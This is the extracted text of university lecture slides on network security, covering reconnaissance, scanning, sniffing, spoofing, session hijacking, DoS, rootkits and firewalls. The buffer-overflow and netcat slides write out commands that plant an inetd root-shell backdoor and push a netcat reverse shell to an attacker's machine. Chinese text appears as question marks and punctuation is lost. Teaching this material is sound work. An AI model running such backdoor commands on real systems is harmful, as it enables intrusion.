Network Security

1
Network Security

• ???? ??? (Bo Cheng)
• ???????
• Tel 05-272-0411 Ext 33512
• Email bcheng_at_ccu.edu.tw

2
We Are in Dangerous Zone!

• Insider
• Outsider

• Unstructured
• Structured

3
What Is Network Security?

• Confidentiality The property that information is
  not made available or disclosed to any
  unauthorized system entity
• Integrity The property that data has not been
  changed, destroyed, or lost in an unauthorized or
  accidental manner.
• Availability services must be accessible and
  available to users

ftp//ftp.rfc-editor.org/in-notes/rfc2828.txt
4
Confidentiality Enabler

• AAA
• Authentication The process of verifying an
  identity claimed by or for a system entity.
• Authorization A right or a permission that is
  granted to a system entity to access a system
  resource.
• Accounting Ensures the actions of a system
  entity be traced uniquely to that entity, which
  can be held responsible for its actions.
• Encryption
• Cryptographic transformation of data (called
  "plaintext") into a form (called "ciphertext")
  that conceals the data's original meaning to
  prevent it from being known or used.

5
Attack Motivations, Phases and Goals

• Analyze Information Prepare Attacks
• Service in use
• Known OS/Application vulnerability
• Known network protocol security weakness
• Network topology

• Actual Attack
• Network Compromise
• DoS/DDoS Attack
• Bandwidth consumption
• Host resource starvation

• Collect Information
• Public data source
• Scanning and probing

6
Tools, Tools, Tools
GSEC SANS GIAC Certification Security Essentials
Toolkit Author Eric Cole et al. ISBN
0789727749
7
Hacker vs. Cracker

• Cracker (??) Someone who tries to break the
  security of, and gain access to, someone else's
  system without being invited to do so.
• ???????????????,????????????
• ????????Crack??(?????????),??????????,?????????
• ??????????????????????????
• Hacker (??) Someone with a strong interest in
  computers, who enjoys learning about them and
  experimenting with them.
• ???????????????
• ?????????,???????????????????????,?????E-mail?????
  ?????????,????????????

http//www.trendmicro.com/tw/products/desktop/gate
lock/use/hackers.htm
8
Dollar Amount of Losses in 2003
Source CSI/FBI 2003 Computer Crime and Security
Survey
9
Denial of Service (DoS)

• The prevention of authorized access to a system
  resource or the delaying of system operations and
  functions (by RFC2828).
• IETF The Internet Engineering Task Force
• RFC Request for Comments
• Modes of Attack
• Consumption of Scarce Resources
• Destruction of Alteration of Configuration
  Information
• Physical Destruction or Alteration of Network
  Components

http//www.cert.org/tech_tips/denial_of_service.ht
ml
10
Building Security Perimeter

• The boundary of the domain in which a security
  policy or security architecture applies (by
  RFC2828)
• Components
• Firewall
• Virtual Private Network (VPN)
• Intrusion Detection System (IDS)
• Defense in depth
• Multiple layers of protection to prevent and
  mitigate security accidents, an event that
  involves a security violation.

11
Firewall

• An gateway that restricts data communication
  traffic to and from one of the connected networks
  (the one said to be "inside" the firewall) and
  thus protects that network's system resources
  against threats from the other network (the one
  that is said to be "outside" the firewall).
• Access Control List (ACL) A mechanism that
  implements access control for a system resource
  by enumerating the identities of the system
  entities that are permitted to access the
  resource.

Outside
ACL
Inside
http//csrc.nist.gov/publications/nistpubs/800-41/
sp800-41.pdf
12
Intrusion Detection System (IDS)

• A security service that monitors and analyzes
  system events for the purpose of finding, and
  providing real-time or near real- time warning
  of, attempts to access system resources in an
  unauthorized manner. (RFC2828)
• Types of IDS
• Host-based operate on information collected
  from within an individual computer system.
• Network-based listen on a network segment or
  switch and detect attacks by capturing and
  analyzing network packets.

http//csrc.nist.gov/publications/nistpubs/800-31/
sp800-31.pdf
13
Virtual Private Network (VPN)

• The VPN is a data network connection that makes
  use of the public communication infrastructure,
  but maintains privacy through the use of a
  tunneling protocol and security procedures.

http//www.computerassets.com/downloads/Why_VPN.do
c
14
Net, Net and Net

• Intranet VPN facilitates secure communications
  between a company's internal departments and its
  branch offices.
• Extranet Extranet VPNs between a company and
  its strategic partners, customers and suppliers
  require an open, standards-based solution to
  ensure interoperability with the various
  solutions that the business partners might
  implement.
• Internet A global and public network connecting
  millions of computers.

15
Financial Losses in 2002

• Firewall
• AAA
• VPN
• Anti-virus
• Intrusion Detection

16
IPSec vs. SSL

• IPSec (Internet Protocol Security)
• Tunnel between the two endpoints
• Works on the Network Layer of the OSI Model-
  without an association to any specific
  application.
• When connected on an IPSec VPN the client
  computer is virtually a full member of the
  corporate network- able to see and potentially
  access the entire network
• The majority of IPSec VPN solutions require
  third-party hardware and / or software
• SSL
• A common protocol and most web browsers have SSL
  capabilities built in.
• More precise access control
• Only work for web-based applications and
  possible to web-enable applications

17
Hacking Techniques
18
Attack Motivations, Phases and Goals

• Analyze Information Prepare Attacks
• Service in use
• Known OS/Application vulnerability
• Known network protocol security weakness
• Network topology

• Actual Attack
• Network Compromise
• DoS/DDoS Attack
• Bandwidth consumption
• Host resource starvation

• Collect Information
• Public data source
• Scanning and probing

19
Tools, Tools, Tools
20
Collect Information

• Public data source
• Scanning and probing

21
Whois Database

• Contain data elements regarding Internet
  addresses, domain names, and individual contacts
• domain name uniquely

22
ARIN

• American Registry for Internet Numbers
• Gather information about who owns particular IP
  address ranges, given company or domain names

23
DNS

• A hierarchical database

Root DNS Servers (start point)
com DNS Servers
net DNS Servers
org DNS Servers
abc.com DNS Servers
The DNS hierarchy
24
DNS Resolve
www.abc.com 10.11.12.13
A recursive search to resolve a domain name
25
Some DNS Record Type
Record Type Name Purpose Example Record Format
Address(A Record) Maps a domain name to a specific IP address www 1D IN A 10.1.1.1
Host Information(HINFO Record) Identifies the host system type www 1D IN HINFO Solaris8
Mail Exchanger(MX record) Identifies a mail system accepting mail for the giver domain _at_ 1D IN MX 10 mail.abc.com
Name Server(NS Record) Identifies the DNS servers associated with a giver domain _at_ 1D IN NS nameserver.abc.com
Text (TXT Record) Associates an arbitrary text string with the domain name System1 IN TXT This is a cool system
26
nslookup
27
A split DNS
EXTERNALDNS
28
DMZ

• DMZ stands for De-Militarized Zone. The DMZ
  setting allows the server that provides public
  resources (Ex. Web or FTP) to map public IP
  addresses for Internet users to use in a
  Broadband sharing router environment.

29
Collect Information

• Public data source
• Scanning and probing

30
Network Mapping

• Map out your network infrastructure
• Mapping and scanning your Internet gateway,
  including DMZ systems, such as Web, mail, FTP,
  and DNS
• Mapping and scanning your internal network
• Techniques
• Finding live hosts
• Tracing your network topology

31
Finding Live Hosts

• Two methods
• ICMP ping
• Ping all possible addresses to determine which
  ones have active hosts
• Ping, using an ICMP Echo Request packet
• Alive, sending an ICMP Echo Reply message
• Otherwise, nothing is listening at that address
• TCP/UDP packet
• If block incoming ICMP
• send a TCP or UDP packet to a port, such as TCP
  port 80

32
Traceroute
Using traceroute to discover the path from source
to destination
33
Cheops
34
Defenses against Network Mapping

• Filter
• IN Firewalls and packet-filtering capabilities
  of your routers
• OUT Stop ICMP Time Exceeded messages leaving
  your network
• Blocking
• Block incoming ICMP messages at gateway
• Ping Web server? Maybe
• Ping DMZ database server? Probably not
• Ping internal network hosts? Definitely not

35
Using port scanners

• Analyzing which ports are open
• To know the purpose of each system
• To learn potential entryways into system
• TCP/IP stack has 65,535 TCP/UDP ports
• well-known port numbers
• TCP port 80
• RFC 1700
• Nmap _at_ www.insecure.org/Nmap

36
Nmap

• What type of packets does the scanning system
  send
• TCP Connect, TCP SYN, TCP FIN,

37
Types of Nmap Scans

• Legitimate TCP connections established using a
  three-way handshake

38
TCP Header
39
The Polite Scan TCP Connect

• Completes the three-way handshake, and then
  gracefully tears down the connection using FIN
  packets
• If closed
• No SYN-ACK returned
• Receive either no response, a RESET packet, or an
  ICMP Port Unreachable
• Easy to detect

40
A Little Stealthier TCP SYN Scan

• TCP SYN scans
• Sending a SYN to each target port
• If open, a SYN-ACK response
• Sends a RESET packet, aborting the connection
• Referred to as half-open scans
• Two benefits
• The end system Not record the connection,
  however, routers or firewalls do
• Its speed

41
Other Scans Violate the Protocol Spec.

• TCP FIN scan
• A FIN packet to tear down the connection, but no
  connections are set up!!
• Xmas Tree scan
• Sends packets with the FIN, URG, and PUSH code
  bits set
• Null scan
• Sends packets with no code bits set

42
TCP ACK Scans
PacketFilterDevice
SYN
SYN-ACK
Allow outgoing trafficand the establishedrespons
es
SYN
Block incoming trafficif the SYN packet is set
EXTERNALNETWORK
INTERNALNETWORK
Allowing outgoing sessions (and responses),
while blocking incoming session initiation
43
TCP ACK Scans (cont.)
44
Vulnerability Scanning Tools

• Whats vulnerability scanner
• Types of vulnerabilities
• Common configuration errors
• Default configuration weaknesses
• Well-known system vulnerabilities

45
Vulnerability Scanning Tools (cont.)
A generic vulnerability scanner
46
Nessus

• Nessus Plug-ins categories
• Finger abuses
• Windows
• Backdoors
• Gain a shell remotely
• CGI abuses
• Remote file access
• RPC
• Firewalls
• FTP
• SMTP

47
The Nessus Architecture

• Client-server architecture
• Client user configuration tool and a results
  repository/report generation tool
• Server vulnerabilities database, a knowledge
  base of the current active scan, and a scanning
  engine
• Supports strong authentication, based on public
  key encryption
• Supports strong encryption based on the twofish
  and ripemd algorithms
• The advantage of the client-server architecture
• The most common use running on a single machine

48
Gaining Access Using Application and Operating
System Attacks
49
Outlines

• Stack-Based Buffer Overflow Attacks
• Password Attacks
• Web Application Attacks

50
What is a Stack-Based Buffer Overflow?
51
The Make up of a Buffer Overflow
52
Application Layer IDS Evasion for Buffer Overflow

• K2 released ADMutate
• polymorphism
• For NOPs
• Substitute a bunch of functionally equivalent
  statements for the NOPs
• For the machine language code
• Applies the XOR to the code to combine it with a
  randomly generated key

53
Once the Stack Is Smashed Now What?

• Spawn a command shell
• Creating a Backdoor using Inetd
• /bin/sh c echo 12345 stream tcp nowait root
  /bin/sh sh I
• gtgt /etc/inetd.conf killall HUP inetd
• Use Netcat to connect to the target system

54
Preview Using Netcat to Actively Push a Backdoor
Command Shell

• Attackers machine
• nc l p port
• Victims machine
• nc attackers_machine port e /bin/sh
• Benefit
• Getting through firewalls

55
Outlines

• Stack-Based Buffer Overflow Attacks
• Password Attacks
• Web Application Attacks

56
Password Attacks

• Guessing Default Passwords
• Password Guessing through Login Scription
• Password cracking

57
Lets Crack Those Passwords!

• Stealing the encrypted passwords and trying to
  recover the clear-text password
• Dictionary
• Brute-force cracking
• hybrid

• Create a password guess

• Encrypt the guess

• Compare encrypted guess with
• encrypted value from the stolen
• password file

• If match, youve got the password!
• Else, loop back to the top.

Password cracking is really just a loop.
58
Tools Cracking Passwords

• Cracking Windows NT/2000 Passwords Using
  L0phtCrack (LC4)
• http//www.atstake.com/products/lc/
• Cracking UNIX-like and Windows-based Passwords
  Using John the Ripper
• http//www.openwall.com/john/

59
Outlines

• Stack-Based Buffer Overflow Attacks
• Password Attacks
• Web Application Attacks

60
Account Harvesting

• Account harvestings concept
• Different error message for an incorrect userID
  than for an incorrect password
• Lock out user accounts?
• Yes, DoS attack
• No, password guessing across the network

61
(No Transcript)
62
Gaining Access Using Network Attacks
63
Sniffer

• A sniffer grab anything sent across the LAN
• What type of data can a sniffer capture?
• Anything, but encrypted
• An attacker must have an account
• Island hopping attack

64
Island hopping attack
65
Some of the most interesting sniffers

• Passive sniffing
• Snort, a freeware sniffer and network-based IDS,
  available at www.snort.org
• Sniffit, freeware running on a variety of UNIX
  flavors, available at reptile.rug.ac.be/coder/sni
  ffit/sniffit.html
• Active sniffing
• Dsniff, a free suite of tools built around a
  sniffer running on variations of UNIX, available
  at www.monkey.org/dugsong/dsniff

66
Sniffing through a Hub Passive Sniffing
BROADCAST ETHERNET
67
Active Sniffing Sniffing through a Switch and
Other Cool Goodies

• Switched Ethernet does not broadcast
• Looks at the MAC address
• Active sniffing tool Dsniff

SWITCHED ETHERNET
68
Advanced sniffing attacks

• Foiling Switches with Spoofed ARP Messages
• Remapping DNS names to redirect network
  connections
• Sniffing SSL and SSH connections

69
Foiling Switches with Spoofed ARP Messages(1)
A switched LAN prevents an attacker from
passively sniffing traffic
70
Foiling Switches with Spoofed ARP Messages(2)
1 Configure IP Forwarding to send packets to the
default router for the LAN and activatesthe
Dsniff program
4 Sniff the traffic from the link.
5 Packets are forwarded from attackers machine
to the actual default router for delivery to the
outside world.
CLIENTMACHINE
Routers IP
Routers MAC
Attackers MAC
Arpspoof redirects traffic, allowing the attacker
to sniff a switched LAN
71
Sniffing and Spoofing DNS
1 Attacker activates dnsspoof program
Attacker quickly sends fake DNS response with any
IP address the attacker wants the victim to use
www.skoudisstuff.com 10.1.1.56
Attacker sniffs DNS request from the line.
www.skoudisstuff.com ,the desired destination at
10.22.12.41
CLIENTMACHINE
Victim now surfs to attackers site instead of
desired destination.
Attackers machine at 10.1.1.56
72
Sniffing an HTTPS connection using dsniffs
person-in-the-middle attack
1 Attacker activates dnsspoof and webmitm programs
2 Dnsspoof sends fake DNSresponse with the IP
addressof the machine runningwebmitm (10.1.2.3)
4 Webmitm proxies the https connection,
establishing an https connection to the server
and sending the attackers own certificate to the
client
IP address 10.1.2.3
www.edsbank.com
3 Victim establishesSSL connection, not knowing
attacker is proxying connection
5 Victim now accessthe desired server,but all
traffic is viewable by attacker using webmitm as
a proxy
www.skoudisstuff.comthe desired destination at
10.22.12.41
IP address 10.22.12.41
73
IP Address Spoofing

• Changing or disguising the source IP address
• Not want to have their actions traced back
• Helps attackers undermine various applications
• IP Address Spoofing
• Flavor 1 Simply Changing the IP Address
• Flavor 2 Undermining UNIX r-Commands
• Flavor 3 Spoofing with Source Routing

74
Simply Changing the IP Address
EVE
SYN (A, ISNA)
ACK (A, ISNA) SYN (B, ISNB)
RESET !!!
BOB
ALICE
75
Spoofing with Source Routing 1/2

• Let the attacker get responses
• Allows the source machine sending a packet to
  specify the path it will take on the network
• Two kinds of source routing
• Loose source routing
• Strict source routing
• Reference RFC 791

76
IP Options
Class Number Length Description
0 0 0 0 0 0 1 2 3 7 0 0 11 Var Var End of Options No op Security Loose Source Routing Record Route
0 0 2 8 9 4 4 Var Var Stream ID (obsolete) Strict Source Routing Internet Time-Stamp
77
Spoofing with Source Routing 2/2
PACKET
Route 1. Alice 2. Eve 3. Bob
Packet Contents
EVE
PACKET
Route 1. Alice 2. Eve 3. Bob
Packet Contents
ALICE
Spoofing attack usingsource routing.
BOB
78
IP Spoofing Defense

• Implement anti-spoof packet filters
• Both incoming (ingress) and outgoing (egress)
• Not allow source-routed packets through network
  gateways

79
IP Spoofing Defense
FILTERINGDEVICE
Packet with IP source addresson Network A
Dropped
Anti-spoof filters.
80
Session Hijacking 1/3

• A marriage of sniffing and spoofing
• Seeing packets, but also monitoring the TCP
  sequence numbers
• Sniffing, then injecting spoofed traffic

Alice telnet
Hi, ImAlice
A network-based session hijacking scenario.
81
Session Hijacking 2/3

• Session hijacking tools
• Hunt, network-based
• Dsniffs sshmitm tool
• Juggernaut, network-based
• TTYWatcher, host-based
• TTYSnoop, host-based

82
Session Hijacking 3/3
ACK ACK ACK ACK
Packets with increasingsequence numbers
An ACK storm triggered by session hijacking.
83
Session Hijacking with Hunt 1/3

• Hunt
• Network-based session-hijacking tool
• Runs on Linux
• Allows to view a bunch of sessions, and select a
  particular one to hijack
• Inject a command or two into the session stream,
  resulting in an ACK storm
• How to prevent an ACK storm?
• ARP spoofing
• Sends unsolicited ARPs, known as gratuitous
  packets
• Most system devour, overwriting the IP-to-MAC
  address mapping in their ARP tables

84
Session Hijacking with Hunt 2/3
IP a.b.c.dMAC AA.AA.AA.AA.AA.AA
IP w.x.y.z MAC BB.BB.BB.BB.BB.BB
ARPw.x.y.z is atDD.DD.DD.DD.DD.DD
ARPa.b.c.d is atEE.EE.EE.EE.EE.EE
IP AnythingMAC CC.CC.CC.CC.CC.CC
85
Session Hijacking with Hunt 3/3
IP e.f.g.hMAC GG.GG.GG.GG.GG.GG
IP i.j.k.lMAC HH.HH.HH.HH.HH.HH
IP w.x.y.z MAC BB.BB.BB.BB.BB.BB
IP a.b.c.dMAC AA.AA.AA.AA.AA.AA
ARPi.j.k.l is atII.II.II.II.II.II
ARPe.f.g.h is atJJ.JJ.JJ.JJ.JJ.JJ
IP AnythingMAC CC.CC.CC.CC.CC.CC
86
Netcat A General Purpose Network Tool

• Swiss Army knife of network tools
• two modes
• Client mode nc
• Listen mode nc l
• Supports source routing

87
Netcat for File Transfer

• Pushing
• Destination machine receiving file
• nc l p 1234 gt file
• Source machine sending file
• nc remote_machine 1234 lt file

Send to TCPport X
SOURCE
DESTINATION
NETCATIN CLIENTMODE
NETCATIN LISTEMMODE
Output toa file
Input froma file
Listenon port X
88
Netcat for File Transfer

• Pulling
• Source machine, offering file for transfer
• nc l p 1234 lt file
• Destination machine, pulling file
• nc remote_machine 1234 gt file

Listenon port X
Connectto port X
SOURCE
DESTINATION
NETCATIN LISTENMODE
NETCATIN CLIENTMODE
Output toa file
Input froma file
Dumps fileacross network
Receives filefrom network
89
Netcat for Port Scanning

• Supports only standard, vanilla port scans,
  which complete the TCP three-way handshake
• echo QUIT nc v w 3 target_machine
  startport - endport

90
Netcat for Vulnerability Scanning

• Used as a limited vulnerability scanning tool
• Write various scripts that implement
  vulnerability checks
• The UNIX version of Netcat ships with several
  shell scripts, including
• RPC
• NFS
• Weak trust relationships
• Bad passwords
• Limited compared to Nessus

91
Relaying Traffic with Netcat
92
Relaying Traffic with Netcat
DMZSYSTEM COMPROMIZEDBY ATTACKER
Listenon UDPport 53
Originateon TCPport 25
No traffic allowed from outside to inside.DNS
traffic (UDP 53) allowed from outside to
DMZ. SMTP traffic (TCP 25) allowed from DMZ to
inside.
93
Introduction to DoS
Denial-of-Service attack categories
94
Stopping Local Services

• Using a local account, stopping valuable
  processes that make up services
• Shut down the inetd process
• Methods for stopping local services
• Process killing
• System reconfiguration
• Process crashing
• A nasty example the logic bomb
• Logic bomb extortion threats

95
Locally Exhausting Resources

• When resources are exhausted, the system grind to
  a halt, preventing legitimate access
• Methods for exhausting local resources
• Filling up the process table
• Filling up the file system
• Sending outbound traffic that fills up the
  communications link

96
Remotely Stopping Services

• Remote DoS attacks more prevalent
• Exploit an error in the TCP/IP stack

Exploit Name Overview of How It Works Susceptible Platforms
Land Sends a spoofed packet, where the source IP address is the same as the destination IP address, and the source port is the same as the destination port, The target receives a packet that appears to be leaving the same port that it is arriving on, at the same time on the same machine. Older TCP/IP stacks get confused at this unexpected event and crash A large number of platforms, including Windows systems, various UNIX types, routers, printers, etc.
Latierra A relative of Land, which sends multiple Land-type packets to multiple ports simultaneously A large number of platforms, including Windows systems, various UNIX types, routers, printers, etc.
97
Remotely Stopping Services
Exploit Name Overview of How It Works Susceptible Platforms
Ping of Death Sends an oversized ping packet. Older TCP/IP stacks cannot properly handle a ping packet greater than 64 kilobytes, and crash when one arrives. Numerous systems, including Windows, many UNIX variants, printers, etc.
Jolt2 Sends a stream of packet fragments, none of which have a fragment offset of zero. Therefore, none of the fragments looks like the first one in the series. As long as the stream of fragments is being sent, rebuilding these bogus fragments consumes all processor capacity on the target machine. Windows 95, 98, NT, and 2000
Teardrop, Newtear, Bonk, Syndrop Various tools that send overlapping IP packet fragments. The fragment offset values in the packet headers are set to incorrect values, so that the fragments do not align properly when reassembled. Some TCP/IP stacks crash when they receive such overlapping fragments. Windows 95, 98, and NT and Linux machines.
Winnuke Sends garbage data to an open file sharing port (TCP port 139) on a Windows machine. When data arrives on the port that is not formatted in legitimate Server Message Block (SMB) protocol, the system crashes. Windows 95 and NT.
98
Remotely Exhausting Resources

• Using a flood of packets
• SYN floods
• Smurf attacks
• Distributed DoS attacks, DDoS

99
SYN Flood

• Three-way handshake
• The TCP/IP stack allocates a small piece of
  memory on its connection queue
• To remember the initial sequence number
• Two ways
• To fill the connection queue with half-open
  connections
• Just fill the entire communications link

100
SYN Flood
EVE
SYN (ISNA)
Connection queuefreed up uponreceiving
RESETpacket.
SYN-ACK
BOB
ALICE
SYN-ACK
EVE
BOB
101
SYN cookies (Linux Kernel)
ISNB is a function of the source IP
address, destination IP address, port numbers,
anda secret seed. Bob doesnt remember ISNB, or
store any information about the half-open
connection in the queue.
When the ACK (B, ISNB) arrives, Bobapplies the
same function to the ACK packet to check if the
value of ISNB is legitimate. If this is a valid
ISNB, the connection is established.
ALICE
BOB
SYN(X, ISNX)
Bob will never store informationin the
connection queue for theseSYNs Instead, Bob
sends SYN(B, ISNB) ACK(X, ISNx)
EVE sends spoofed packets from X
EVE
102
Smurf Attacks

• Also known as directed broadcast attacks
• Router converts the IP broadcast message to a MAC
  broadcast message using a MAC address of
  FFFFFFFFFFFF
• Every machine read the message and send a respone

103
Smurf Attacks
104
DDoS Architecture

• First, tack over a large number of victim
  machine, referred to as zombies
• Install the zombie software on the systems
• The component of the DDoS tool
• The attacker uses a special client tool to
  interact with the zombies

105
A DDoS AttackTribe Flood Network 2000
106
TFN2K, a Powerful DDoS Tool

• Attack types including
• Targa
• UDP Flood
• SYN Flood
• ICMP Flood
• Smurf Attack
• Mix Attack-UDP, SYN, and ICMP Floods

107
TFN2K, a Powerful DDoS Tool

• Features
• Authentication using an encrypted password
• All packets from the client to the zombies are
  sent using an ICMP Echo Reply packet
• ICMP Echo Replies allowed into many network
• No port number associated with ICMP
• Finding the attacker is very difficult
• The client machine included a encrypted file
  indicating the IP addresses of all of the zombies
  under its control
• Allows the attacker to run a single arbitrary
  command simultaneously on all zombies

108
Maintaining Access Trojans, Backdoors, and
Rootkits
109
Backdoors

• Allow an attacker to access a machine using an
  alternative entry method
• To bypass the front door
• When Attackers Collide
• Attacker closes security holes, and installs
  backdoor
• Backdoor security controls even stronger than
  standard system security controls, possibly using
  SSH

110
Backdoors Melded into Trojan Horses
Type of Trojan Horse Backdoor Characteristics Analogy Example Tools
Application-level Trojan Horse Backdoor A separate application runs on the system, giving the attacker backdoor access. An attacker adds poison to your soup. A foreign entity is added into the existing system by the attacker. Back Orifice 2000 (BO2K) Sub7 Hack-a-tack QAZ
Traditional RootKits Critical operating system components are replaced or modified by the attacker to create backdoors and hide on the system An attacker replaces the potatoes in your soup with modified potatoes that are poisonous. The existing components of the system are modified by the attacker. Linux RootKit5 for Linux T0rnKit for Linux, Solaris Other, platform-specific RootKits for SunOS, AIX, SCO, Solaris, etc.
111
Backdoors Melded into Trojan Horses (cont.)
Type of Trojan Horse Backdoor Characteristics Analogy Example Tools
Kernel-level RootKits The operating system kernel itself is modified to foster backdoor access and allow the attacker to hide. An attacker replaces your tongue with a modified, poison tongue so that you cannot detect their deviousness by looking at the soup. The very organs you eat with are modified to poison you. Knark for Linux Adore for Linux Plasmoids Solaris Kernel-Level RootKit Windows NT RootKit
112
Application-Level

• Add a separate application to a system
• Mostly developed for Windows platforms
• RootKits are more popular in the UNIX world
• EX. Back Orifice 2000 (BO2K)

113
Traditional RootKits

• Replace critical operating system executables
• Traditionally focused on UNIX systems
• NT/2000 RootKits replace Dynamic Link Libraries

114
Comparison
EVIL BACKDOOR EVIL BACKDOOR EVIL BACKDOOR
Good Login Good PS Good ifconfig
KERNEL KERNEL KERNEL
System Executables Remain intact
Login With Backdoor Trojan PS Trojan ifconfig
KERNEL KERNEL KERNEL
System Executables Are altered to Include Backdoor
and Other stealth capabilities
Comparing Application-Level Trojan horse
backdoors with traditional RootKits
115
What Do Traditional RootKits Do?

• RootKits depend on the attacker already having
  root access
• A RootKit is a suite of tools that allow the
  attacker to maintain root-level access by
  implementing a backdoor

116
/bin/login Replacement

• Authentication
• A RootKit replaces /bin/login with a modified
  version that includes a backdoor password

117
Traditional RootKits

• Linux RootKit 5 (lrk5)
• Targeting Linux systems
• t0rnkit
• Targeting Linux and Solaris systems

118
NastiestKernel-Level RootKits

• The kernel is the fundamental, underlying part of
  the OS

Trojan Login Trojan PS Trojan ifconfig
KERNEL KERNEL KERNEL
Good Login Good PS Good Ifconfig Good tripwire
KERNEL KERNEL TROJAN KERNEL MODULE TROJAN KERNEL MODULE
119
What They can Do

• The Power of Execution Redirection
• Most Kernel-level RootKits include a capability
  to do execution redirection
• Bait-and-switch
• /bin/login -gt /bin/backdoorlogin
• File Hiding
• Kernel-level RootKits support file hiding
• Implemented in the kernel
• Process Hiding
• Hiding processes, such as a Netcat backdoor
• Network Hiding
• netstat
• Masking particular network port usage
• Nmap

120
How to Implement Kernel-Level RootKits

• Loadable Kernel Modules
• Many kernel-level RootKits are implemented as
  LKMs
• insmod knark.o

121
Some Examples of Kernel-Level RootKits

• Knark, a Linux Kernel-Level RootKit
• Remote execution
• Promiscuous mode hiding
• Taskhacking
• Real-ttime process hiding
• Kill -31 process_id
• Kernel-module hiding
• Knark package includes a separate module called
  modhide

122
Some Examples of Kernel-Level RootKits

• Adore, Another Linux Kernel-Level RootKit
• Plasmoids Solaris Loadable Kernel Module RootKit
• Windows NT Kernel-Level RootKit by RootKit.com
• www.rootkit.com
• A patch

123
Network Compromise Denial of Service
124
Mail spam

• Unsolicited Commercial E-mail (UCE) Junk e-mail
• usually annoying but harmless commercial
  advertising.
• But
• Spread a computer virus
• Dangerous when it is a fraud.
• Illegal when a chain letter involves the U.S.
  Postal Service
• IDC predicts that a growing glut of spam
• daily volume of e-mail from 31 billion messages
  2002 to 60 billion in 2006.
• ??????????????? E-mail address ???????? mail
  server ?? relay ????

125
History of Spam

• Nothing with Hormel product, SPAM (SPiced hAM).
• Monty Python's sketch
• A restaurant that serves SPAM with every meal.
• A particular customer tries to order a meal
  without SPAM.
• A side table of SPAM-loving Vikings
• When they hear the word SPAM they would joyously
  sing a song about their love for SPAM.
• The song quietly started of with the words, "
  SPAM, SPAM, SPAM, SPAM, SPAM..." The Vikings
  would sing the song, rising in volume and
  drowning out other conversations.
• During the 2.5 minute sketch, the word SPAM would
  be used more than 100 times.
• The analogy of unwanted messages drowning out
  normal Internet communications.

http//notebook.ifas.ufl.edu/spam/
126
React to Mail spam

• ?????????????????????????????????????????,
  ???????????????
• ??? mail server ????????????,??????, (
  ???????????? ????????? )?

Source http//140.111.1.22/tanet/spam.html
127
????(Malicious Code)

• ???????????????????,??????(Viruses)????????(Trojan
  )?????(Worm)?

Analysis by Symantec Security Response using
data from Symantec Security Response, IDC,
ICSA 2002 estimated Source CERT
128
?!?!?!
http//www.trendmicro.com/tw/about/news/pr/archive
/2003/pr030827.htm
??, ?.???
129
What Is Viruses (???? )?

• A hidden, self-replicating section of computer
  software, usually malicious logic, that
  propagates by infecting--i.e., inserting a copy
  of itself into and becoming part of--another
  program (RFC 2828).
• A virus cannot run by itself it requires that
  its host program be run to make the virus active.
• When does it bomb?
• ?????????????????,????????????
• PETER-2???2?27???3???,????HD???
• ???????13???????

130
What Is Trojan Horse (??????)?
A computer program that appears to have a useful
function, but also has a hidden and potentially
malicious function that evades security
mechanisms, sometimes by exploiting legitimate
authorizations of a system entity that invokes
the program.
Rootkit
Backdoor

• ???????????????????????

131
What Is Worm (????)?

• A computer program that can run independently,
  can propagate a complete working version of
  itself onto other hosts on a network, and may
  consume computer resources destructively.
• ???????????????,??????????????,?????????????
• ?????????????(LAN)?????(Internet)?? E-mail
  ??????????????VBS_LOVELETTER????????

132
Viruses, Worm and Trojan Horse
Source http//www.trendmicro.com/tw/security/gene
ral/guide/overview/guide01.htm
133
Anti-Virus Management

• ??????????????????????Internet?????
• ????????
• ??????????????????
• ???????????
• ??????
• OS???????????????
• ???????????????
• ????????

134
Risk Management
135
Threat, Vulnerability and Asset
136
Risk Mitigation Action Points
137
Security Management

• ISO/IEC7799-12000 (Part 1)
• a standard code of practice and can be regarded
  as a comprehensive catalogue of good security
  things to do.
• BS7799-22002 (Part 2)
• a standard specification for an Information
  Security Management Systems (ISMS).
• Senior Management monitor and control their
  security, minimizing the residual business risk
  and ensuring that security continues to fulfill
  corporate, customer and legal requirements.
• Scope, ISMS Policy, Risk assessment, Risk
  management/Risk treatment, Select control
  objectives and controls, Statement of
  Applicability (SOA), Risk Treatment Plan

138
Guidelines on Firewalls
139
Building Internet Firewalls
140
Packet Filter Firewalls

• Access control based upon several pieces of
  information contained in a network packet
• The source address of the packet
• The destination address of the packet
• The type of traffic
• the specific network protocol being used to
  communicate between the source and destination
  systems or devices (e.g., ICMP)
• Possibly some characteristics of the Layer 4
  communications sessions, such as the source and
  destination ports of the sessions
• Interface of the router the packet came from and
  which interface of the router the packet is
  destined for
• this is useful for routers with 3 or more network
  interfaces.

141
Boundary Routers

• The packet filter, referred to as a boundary
  router, can block certain attacks, possibly
  filter un-wanted protocols, perform simple access
  control, and then pass the traffic onto other
  fire-walls that examine higher layers of the OSI
  stack.

Packet Filter used as Boundary Router
142
Basic Weaknesses Associated with Packet Filters

• Do not examine upper-layer data
• Cannot prevent attacks that employ
  application-specific vulnerabilities or
  functions.
• Limited information available to the firewall
• Logging functionality present in packet filter
  firewalls is limited.
• Do not support advanced user authentication
  schemes.
• Network protocol weakness
• Vulnerable to TCP/IP specification and protocol
  stack, such as network layer address spoofing.
• Small number of variables used in access control
  decisions
• Susceptible to security breaches caused by
  improper configurations.
• But
• Consequently, packet filter firewalls are very
  suitable for high-speed environments where
  logging and user authentication with network
  resources are not important.

143
Packet Filter Rulesets

• Actions
• Accept
• Deny
• Discard
• By default
• Any type of access from the inside to the outside
  is allowed.
• No access originating from the outside to the
  inside is allowed except for SMTP and HTTP.
• SMTP and HTTP servers are positioned behind the
  firewall.

144
Stateful Inspection Firewalls

• More secure
• Tracks client ports individually rather than
  opening all high-numbered ports for external
  access.
• Useful or applicable only within TCP/IP network
  infrastructures.
• Representing a superset of packet filter firewall
  functionality.

145
Application-Proxy Gateway Firewalls

• Combine lower layer access control with upper
  layer (Layer 7 . Application Layer)
  functionality.
• For Example Web Proxy
• In addition to the ruleset, include
  authentication of each individual network user
• User ID and Password Authentication,
• Hardware or Software Token Authentication,
• Source Address Authentication, and
• Biometric Authentication.

146
Dedicated Proxy Servers

• Are useful for web and email content scanning
• Java applet or application filtering
• ActiveX control filtering
• JavaScript filtering,
• Blocking specific Multipurpose Internet
  Multimedia Extensions (MIME) types . for example,
  .application/msword. for Microsoft Word documents
  
• Virus scanning and removal,
• Macro virus scanning, filtering, and removal,
• Application-specific commands, for example,
  blocking the HTTP .delete. command, and
• User-specific controls, including blocking
  certain content types for certain users.

147
Dedicated Proxy Servers Deployments
148
Network Address Translation

